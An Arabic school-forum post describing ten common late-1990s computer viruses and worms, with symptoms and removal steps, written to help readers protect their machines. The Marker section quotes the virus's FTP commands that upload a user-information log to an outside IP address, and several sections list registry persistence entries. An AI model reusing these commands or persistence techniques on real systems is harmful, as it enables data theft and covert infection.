مدرسة أبورماد الابتدائية القديمة *( إدارة الشلاتين التعليمية )*

منتدي مدرسة أبورماد الابتدائية القديمة يرحب بكم ويتمني منكم المشاركة الفعالة
مدرسة أبورماد الابتدائية القديمة *( إدارة الشلاتين التعليمية )*

المشرف العام للمنتدي أستاذ / محمد حسن أحمد

يسر مدرسة أبورماد أن ترحب بكم في منتداها وترجو منكم التسجيل والتواصل
هل تعرف شيئا عن أبورماد ؟ دائما تسمع وتقرأ - شلاتين وحلايب _ ولكن هل سمعت أو قرأت شيئا عن أبورماد ؟ والتي تعد هي الأم وهي القلب الحقيقي للمثلث الجنوبي في مصر .......... سوف تقرأ وتعرف كل شيء عنها من منتدي أبورماد درة الجنوب قريبا
يسر منتدي مدرسة أبورماد أن تعلن عن منتدى الأصدقاء الجديد & يسر السيد بسام كامل شحات تواصلكم معه على منتدي الأصدقاء
قريبا إن شاء الله نتيجة الصف السادس الابتدائي على منتدى المدرسة

المواضيع الأخيرة

» مراجعة موضوعات مادة اللغة العربية للصف السادس
الجمعة ديسمبر 10, 2010 8:23 am من طرف Admin

» مراجعة للصف السادس
الخميس ديسمبر 02, 2010 12:40 am من طرف النجعاوي

» أجعل جهازك يبدأ ببسم الله
السبت نوفمبر 13, 2010 3:58 pm من طرف أشرف سعيد مبارك

» أكثر الفيروسات إنتشاراً
الثلاثاء أكتوبر 26, 2010 2:02 am من طرف أشرف سعيد مبارك

» شرح صحيح البخاري ج1
الإثنين أكتوبر 25, 2010 2:00 am من طرف النجعاوي

» تفسير سورة الكهف للقرطبي ج1
الإثنين أكتوبر 25, 2010 1:55 am من طرف النجعاوي

» هام للزوار
الأحد أكتوبر 24, 2010 11:44 pm من طرف Admin

» شرح شذور الذهب ج 1
الأحد أكتوبر 24, 2010 10:40 am من طرف النجعاوي

» مصادر التشريع المتفق عليها بين جمهور الأمة
الأحد أكتوبر 24, 2010 10:34 am من طرف النجعاوي

بسم الله الرحمن الرحيم

مرحبا بكم في منتدى مدرسة أبورماد الابتدائية القديمة

    أكثر الفيروسات إنتشاراً

    شاطر

    أشرف سعيد مبارك

    عدد المساهمات : 3
    تاريخ التسجيل : 20/10/2010

    أكثر الفيروسات إنتشاراً

    مُساهمة  أشرف سعيد مبارك في الثلاثاء أكتوبر 26, 2010 2:02 am


    أكثر الفيروسات انتشاراً
    تضمن العدد السابق مقالة توضح المقصود بمصطلح "فيروسات الحواسيب"، أوضح طبيعة عملها وأنواعها، بهدف الوقاية منها ومكافحتها. ونتناول في ما يلي شرحاً عن الفيروسات العشرة الأكثر انتشاراً، حسب تصنيف الموقع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] لنلمس فعلياً ما تفعله الفيروسات المنتشرة حالياً، وندرك خطرها على أنظمة الحواسيب التي نستخدمها، فنستطيع الوقاية منها، أو التخلص منها في حالة إصابتنا بها.
    ونذكر أنه يجب باستمرار استخدام واحداً من برامج اكتشاف وإزالة الفيروسات الشهيرة المتوفرة، كبرامج McAfee، أو Norton AntiVirus، أو Dr. Salamon، مع تحديثها دورياً، من مواقع الشركات المنتجة لها على شبكة إنترنت، لتبقى حواسيبنا "بصحة" جيدة.
    1- الفيروس Cap
    هو أحد فيروسات الماكرو لملفات وورد. ظهر عام 1997، ثم انتشر إلى درجة كبيرة. ويتألف من عشرة ماكرويات، يدعى أحدها CAP، وهو الذي يعطي الفيروس اسمه، وتستدعيه ماكرويات الفيروس التسعة الأخرى:
    AutoExec,AutoOpen,FileSave, FileSaveAs, FileTemplates, ToolsMacro, FileClose, FileOpen, AutoClose.
    يتضمن الفيروس التعليق التالي:
    C.A.P: Un virus social.. y ahora digital.. '"j4cKy Qw3rTy"
    (jqw3rty@hotmail.com). Venezuela, Maracay, Dic 1996.
    P.D. Que haces gochito ? Nunca seras Simon Bolivar.. Bolsa !
    وعندما يكرر ذاته، ينسخ أولاً، مجموعة الماكرويات العشرة الخاصة به، ثم يفحص عناصر قوائم أوامر محرر النصوص وورد، ويجمع أسماءها، التي تختلف من لغة إلى أخرى، ثم يعترض سبيل خمسة ماكرويات أخرى، بحيث يضيف إليها مؤشراً لتنفيذ الماكرو Cap، ويحذف أية ماكرويات موجودة في القالب العام Normal.dot، بالإضافة إلى أنه يحذف عنصرين من قائمة "أدوات" في البرنامج، هما: "ماكرو" و"تخصيص"، بينما يشل فعالية الأمر "قوالب ووظائف إضافية" في القائمة ذاتها. يستخدم الفيروس المعلومات الموجودة في حقل "الوصف"، (وهو الحقل الموجود في أسفل صندوق الحوار، الذي يظهر عند اختيار "أدوات/ماكرو/وحدات ماكرو") للتعرف على الماكرويات الخاصة به. يبدأ حقل الوصف فيها بالحرف F%، فيبدأ حقل الوصف للماكرو FileOpen، مثلاً، بالرموز F%O، وللماكرو FileSave بالرموز F%S. يعدل الفيروس إعدادات حفظ الوثائق، فيضبط الخيارات على الحفظ السريع، ويسمح بالحفظ التلقائي، مع الانتظار 10 دقائق بين مرات الحفظ التلقائي، ويسمح بحفظ التغيرات في القالب العام Normal.dot بدون تأكيد المستخدم.
    يفحص الفيروس استخدام الماكرو FileSaveAs لتسجيل وثيقة، أو قالب، أو ملف RTF (Rich Text Format)، ويحول في جميع تلك الحالات، الملف الناتج إلى قالب ويلوثه بمجموعة ماكروياته.
    يمكن، لإزالة الفيروس، استخدام أحد برامج اكتشاف وفحص الفيروسات الشهيرة، أو حذف ملف القالب العام NORMAL.DOT، للسماح لبرنامج وورد بإعادة إنشائه، عندما يعمل البرنامج في المرة التالية، وإلغاء تخصيص الفيروس لقائمة "أدوات"، بإعادة إظهار "ماكرو" و"تخصيص".
    2 - الفيروس W97M.Ethan.A
    وهو فيروس ماكرو لبرنامج وورد 97، ظهر في بداية هذا العام، وينتشر بسرعة كبيرة. يتألف من ماكرو واحد، ويبلغ طول شيفرته حوالي 50 سطراً، يحشرها في بداية وحدة ThisDocument، وهي الوحدة الافتراضية للغة VBA في قالب وثيقة وورد. يضيف الفيروس ذاته إلى القالب العمومي Normal.dot، لدى إغلاق وثيقة مصابة، ويصيب بعد ذلك، جميع الوثائق والقوالب التي يفتحها المستخدم، لأنه يصبح جزءاً من الوحدة ThisDocument. يستخدم الفيروس الملف النصي المؤقت المسمى C:\ethan.___ أثناء إصابة وثيقة أو قالب، ويضبط سماته (attributes) بحيث يكون ملف نظام مخفياً.
    يمكن أن لهذا الفيروس، بإمكانية نسبتها 30%، أن يعدل خصائص وثيقة مصابة به، أثناء إغلاقها، فيصبح عنوان الوثيقة (Title) = "Ethan Frome"، واسم الكاتب (Author)= "EW/LN/CB" ، والكلمات الأساسية (Keywords) ="Ethan".
    لهذا الفيروس سلوك آخر، هو أنه يحذف الملف Class.sys (الذي ينشأ عن الإصابة بفيروس W97M/Class) إذا اكتشف وجوده على القرص الصلب.
    يجب لإزالته، استخدام أحد برامج اكتشاف الفيروسات الحديثة، ثم حذف الملف C:\Ethan___، وإعادة إدخال أي شيفرة مضافة إلى الوحدة البرمجية ThisDocument، لأن برنامج إزالة الفيروسات يزيلها من تلك الوحدة عند إزالة الفيروس ذاته.
    3 - فيروس W97M/Marker.C
    فيروس ماكرو لبرنامج وورد97، يصيب الوثائق والقوالب، ويلغي خيار الحماية من فيروسات الماكرو في برنامج وورد، والذي يمكن الوصول إليه من (أدوات/خيارات/عام). يحاول الفيروس الاحتفاظ بسجل يتضمن اسم المستخدم، وعنوانه، والوقت والتاريخ، ويحصل على تلك المعلومات من وورد، والتي تظهر باختيار (أدوات/خيارات/معلومات المستخدم)، ويضيفها كتعليق إلى نهاية شيفرته. إذا كان التاريخ هو الأول من الشهر، ينشئ الفيروس ملفاً على القرص C:\ له الامتداد .SYS ويبدأ بالحروف HSF تتبعها أربعة رموز مولدة عشوائياً، وينسخ إليه المعلومات التي سجلها عن المستخدم مع شيفرة الفيروس، ثم ينشئ ملفاً آخر يدعى C:\netldx.vxd يتضمن تعليمات لبرنامج نقل الملفات [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] هي:
    "o 209.201.88.110"
    "user anonymous"
    "pass itsme@"
    "cd incoming"
    "ascii"
    "put " & LogFile
    "quit"

    يمثل LogFile متغيراً يشير إلى الملف من نوع .SYS الذي سجله على القرص الصلب، وينفذ برنامج [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] تعليمات الملف C:\netldx.vxd، الذي يرسل شيفرة الفيروس إلى موقع مؤلف الفيروس المدعو CodeBreaker على إنترنت، إلى العنوان 209.201.88.110، ويضبط قيمة المفتاح التالي في ملف التسجيل للنظام المصاب، بقيمة True:
    "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile"
    وتكون هذه القيمة المنطقية false إذا لم يكن النظام مصاباً بالفيروس، وتصبحtrue بعد الإصابة به.
    يحتاج اكتشاف وإزالة الفيروس إلى أحد البرامج الشهيرة لإزالة الفيروسات.
    4 - الفيروس ATAKA (A.K.A. IE0199.EXE)
    فيروس من نوع حصان طروادة، أرسل كملف مرفق بالبريد الإلكتروني إلى الكثير من المستخدمين، بعد تزوير عنوان البريد الإلكتروني للمرسل، ليبدو صادراً من شركة مايكروسوفت، وتتضمن رسالة البريد الإلكتروني إعلاماً بأن الملف المرفق المسمى IE0199.EXE، هو تحديث لبرنامج إنترنت إكسبلورر.
    ينزل الفيروس عند تنفيذه أول مرة، ملفين، هما: MPREXE.DLL وSNDVOL.EXE في مجلد Windows\System، ويحذف الملف sndvol32.exe من الدليل Windows\System32، ويضيف اسم الملف MPREXE.DLL إلى مداخل برامج القيادة في قسم [boot] في ملف SYSTEM.INI. وهذا يؤدي إلى تحميل وتشغيل الملف MPREXE.DLL عند تشغيل النظام مرة أخرى، ويضيف المفاتيح التالية إلى ملف التسجيل:
    HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\
    Internet Settings\EnableAutodial="00,00,00,00"
    HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\SessionManager\
    Known16DLLs\mprexe.dll="mprexe.dll"
    HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\SessionManager\
    Known16DLLs\SNDVOL.EXE="SNDVOL.EXE" يؤدي ذلك إلى تشغيل الملف SNDVOL.EXE بواسطة الملف MPREXE.DLL، مع بقائه مقيماً في الذاكرة، وهو يستهدف إغراق مزودات إنترنت معينة بطلبات اتصال TCP، وهي المزودات ذات العناوين: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] و[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] وns.infotel.bg.
    اتبع الخطوات التالية لإزالة الفيروس:
    1 - أغلق النظام وأقلع في وضع دوس
    2 - احذف الملفين SNDVOL.EXE، وMPREXE.DLL، من المجلد Windows\System.
    3 - احذف الملف mprexe.dll فقط، من مدخل الأقراص في قسم [boot]، لملف SYSTEM.
    4 - احذف المداخل التالية من ملف التسجيل:
    HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\SessionManager\
    Known16DLLs\mprexe.dll="mprexe.dll"
    HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\SessionManager\
    Known16DLLs\SNDVOL.EXE="SNDVOL.EXE"
    5 - الفيروس URLSNOOP/Picture.exe
    الاسم الشائع لهذا الفيروس Picture.exe، وهو من نوع حصان طروادة، وانتشر عبر البريد الإلكتروني غير المرغوب به (Spam)، حيث يرسل إلى كملف تنفيذي مرفق ببريد إلكتروني. تتم عند تشغيل هذا الفيروس، العلمية التالية: يعمل الملف MANAGER.EXE وليس Picture.exe، وينزل الملف NOTE.EXE (المماثل للملف PICTURE.EXE) في الدليل الفرعي لنظام التشغيل ويندوز، ويضيف اسمه NOTE.EXE إلى سطر RUN في ملف WIN.INI، مما يؤدي إلى تشغيل NOTE.EXE عند إقلاع النظام.
    لدى تشغيل الملف NOTE.EXE يفحص وجود الملف $2321.dat ضمن دليل ويندوز، فإذا لم يكن موجوداً، فإنه يحاول أن ينشئ ملفاً مؤقتاً على الدليل C:\ باسم file0001.chk، فإذا نجح في ذلك، ينشئ لائحة بالملفات من النوع TXT وHTML الموجودة على الأقراص الصلبة للمستخدم، C:، وD:، وE:، … إلخ، حتى يصل إلى قرص لا يستطيع أن ينشئ عليه ملفاً، وهو عادة، القرص المدمج، ثم يسجل لائحة أسماء الملفات التي وجدها على ملف باسم $2321.dat، بتشفير البيانات بحيث يضيف 5 إلى كل حرف ASCII يسجله، وينهي تشغيله. فإذا كان المستخدم يملك برنامج زبون لشركة ALO على جهازه، فإن الفيروس ينظر أيضاً داخل الملف C:\AOL\DB\MAIN.IDX، الذي يتضمن اسم المستخدم وكلمة السر، مع احتمال إرسالها إلى مبرمج الفيروس. وعندما يعمل الملف MANAGER.EXE، ثانية، يحاول الفيروس إرسال الملفين $2321.dat، و$4135.dat إلى بريد إلكتروني موجود في الصين!
    6 - W32/Ska (A.K.A Happy99.exe)
    فيروس من نوع دودة، أرسل أول مرة إلى عدد من مجموعات الأخبار، يوجد ضمن ملف باسم Happy99.exe، يظهر عند تشغيله رسالة على الشاشة تهنيء بحلول السنة الميلادية 1999: Happy New Year 1999، مع رسوم لألعاب نارية. كان سبب تكاثره الرئيسي تبادله ضمن مجموعات الأخبار، لكنه يمكن أن ينشر ذاته أيضاً، بالتصاقه برسائل البريد الإلكتروني، وإرساله كملف مرفق، بدون علم المستخدم، واعتبر دودة بسبب هذا السلوك. يصيب الفيروس الجهاز عند تسلم رسالة بريد إلكتروني مع ملف مرفق يدعى Happy99.exe، يرسله الفيروس بدون علم المستخدم المرسل. وبمجرد تشغيل الملف Happy99.exe، تظهر رسوم ألعاب نارية على شاشة المستخدم، وينسخ ذاته إلى مجلد النظام Windows\System تحت الاسم SKA.EXE، ثم يفك من داخله ملف من نوع DLL باسم SKA.DLL ويحفظه في المجلد Windows\System، إذا لم يكن موجوداً.
    يعد الملف SKA.EXE نسخة من الملف الأصلي، لكنه لا يعمل مثل الملف Happy.EXE، ولهذا فهو لا ينسخ ذاته مرة أخرى ولا يظهر ألعاباً نارية على شاشة المستخدم.
    تفحص هذه الدودة بعد ذلك وجود الملف WSOCK32.SKA في المجلد Windows\System. فإذا لم يكن موجوداً وكان الملف WSOCK32.DLL موجوداً، فإنها تنسخ الملف WSOCK32.DLL على WSOCK32.SKA.
    تنشئ الدودة بعد ذلك، المفتاح التالي في ملف التسجيل:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Ska.exe="Ska.exe"
    والذي يؤدي إلى تشغيل الملف SKA.EXE في المرة التالية التي يعمل فيها نظام التشغيل. وعندما يحدث هذا تلتصق الدودة بالملف WSOCK32.DLL، وتضيف علاقات إلى الوظائف المصدرة EnumProtocolsW، وWSAAsyncGetProtocolByName.
    تستدعي الشيفرة الملصوقة وظيفتين من ملف SKA.DLL تدعيان mail، وnews، تسمحان للدودة بالالتصاق في رسائل البريد الإلكتروني SMTP، وفي الرسائل الموجهة إلى مجموعات الأخبار.
    7 - فيروس Laroux
    فيروس ماكرو لبرنامج إكسل، ظهر في صيف 1996، مكتوب بلغة VBA، يصبح فعالاً حالما يحمل برنامج إكسل المصاب به، وينقل العدوى إلى أي مصنف إكسل يفتحه المستخدم. يتألف من ماكرويين هما auto_open وcheck_files. يتم تنفيذ الماكرو auto_open كلما تم فتح جدول ممتد مصاب بالفيروس، وينفذ بعده ماكرو check_files، الذي يفحص مسار إقلاع إكسل. فإذا لم يجد فيه ملفاً باسم PERSONAL.EXE، فإنه ينشئه وينسخ إليه وحدة برمجية باسم laroux.
    الملف PERSONAL.EXE هو الملف الافتراضي لأي ماكرو مسجل في إكسل، وهكذا يمكن أن يوجد هذا الملف على نظامك على الرغم من أنه قد لا يكون مصاباً بهذا الفيروس. يكون مسار إقلاع إكسل، عادة، \Micorsoft\Excel\Xlstart، ولكن يمكن تغييره من "أدوات/خيارات/عام/موقع ملف بدء التشغيل البديل". لا يسبب هذا الفيروس أضراراً، سوى أنه يكرر ذاته في جميع الملفات التي يتم فتحها ببرنامج إكسل مصاب.
    8- فيروس W32.CIH
    ظهرت عائلة هذا الفيروس في يونيو 1998، من جنوب شرق آسيا، وتوجد منه حالياً، ثلاثة نماذج معروفة، وهو منتشر على نطاق واسع، ويصيب ملفات ويندوز95 من هيئة PE، ويستطيع أن يقسم شيفرته إلى عدة أجزاء ويضعها في الأجزاء غير المستخدمة من الملفات المصابة، حيث تتضمن ملفات PE، عادة، الكثير من المساحة غير المستخدمة.
    يتضمن الفيروس شحنة خطيرة جداً، تعمل في اليوم السادس والعشرين من كل شهر، وتحاول أن تكتب على ذاكرة فلاش بيوس في الجهاز، (حيث تسمح معظم أجهزة الحواسيب الحديثة، بتغيير محتويات ذاكرة فلاش بيوس)، مما يعطل عمل الجهاز، ويصبح من المستحيل إقلاعه بدون استرجاع المحتويات الأصلية لتك الذاكرة. لا يكتفي الفيروس بذلك، بل يكتب فوق القرص الصلب ويملأه ببيانات لا معنى لها.
    9 - فيروس WM97.CLass
    واحد من أوائل عائلات فيروسات الماكرو لبرنامج وورد، يضيف شيفرة الفيروسية إلى الوحدة البرمجية ThisDocument، والتي تكون دائماً موجودة في ملفات الوثائق والقوالب لوورد 97. لهذا لفيروس خمسة أشكال، تظهر جميعها رسالة مزعجة على الشاشة في يوم محدد من الشهر، حيث يظهر الشكل A منه، مثلاً، في اليوم 31 من كل شهر الرسالة التالية:"This is Class". تنشئ معظم أشكال هذا الفيروس ملفاً نصياً باسم Class.sys على الدليل الرئيسي للقرص الصلب، بينما يغير الشكل D منه مفتاحاً في ملف التسجيل لويندوز95، بحيث يستبدل اسم المستخدم المسجل باسم كاتب الفيروس.
    10 - فيروس W97M/Brenda.A
    وهو فيروس ماكرو لوورد 97، من النوع الذي يتطفل على وحدة البرمجية للفئة، ويضع شيفرته في الحاوية ThisDocument، من الوثيقة، لكنه لا يكتب فوق أي جزء من الشيفرة الموجودة فيها.
    يغير الفيروس اسم القرص C: إلى n0nuts، ويغير أيقونة "جهاز الكمبيوتر" إلى أيقونة قرص الشبكة المفصول.
    ويحاول تغيير مفاتيح ملف التسجيل التالية:
    "HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
    "HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon"
    "HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\00000008", "SMTP Display Name"
    "HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\00000008", "SMTP Email Address"
    "HKEY_CURRENT_USER\Software\Nico Mak Computing\WinZip\WinIni", "Name"
    "HKEY_CURRENT_USER\Software\Nico Mak Computing\WinZip\WinIni", "SN"
    "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Hearts", "name"
    الفيروسات الجديدة
    يبين الموقع ذاته أحدث الفيروسات التي وردت عنها أحدث التقارير، وهي: W32/Ska، وEthan، وMarker، وFooter، وPicture، وAtaka، وXF/Sic، والتي ورد معظمها في قائمة الفيروسات الأكثر انتشاراً، ما عدا الفيروسين: Footer، وXF/Sic.
    •‏Footer: وهو فيروس ماكرو لملفات وورد97، ويصيب ملف القالب العام Normal.dot، في الحاوية ThisDocument، ويغير خاصة الوثيقة name إلى "FootPrint1"، بالإضافة إلى أنه يكتب فوق القسم الأول من حاشية الوثيقة السفلية، ويستبدل محتوياتها بالمسار الذي توجد فيه الوثيقة على القرص.
    •‏XF/Sic.A: وهو فيروس يصيب مصنفات إكسل، ويسبب تغيير اسم الجدول الممتد عند عرضه بأمري "خصائص/المحتويات" إلى XL4Poppy، وظهور رسالتين يعرضان اسم مبرمج الفيروس، وتغيير اسم التطبيق من Micorsoft Excel، إلى XF/Classic.Poppy حوالي الساعة 6:30 بعد الظهر، خلال استخدام إكسل.


      الوقت/التاريخ الآن هو الجمعة سبتمبر 22, 2017 5:43 am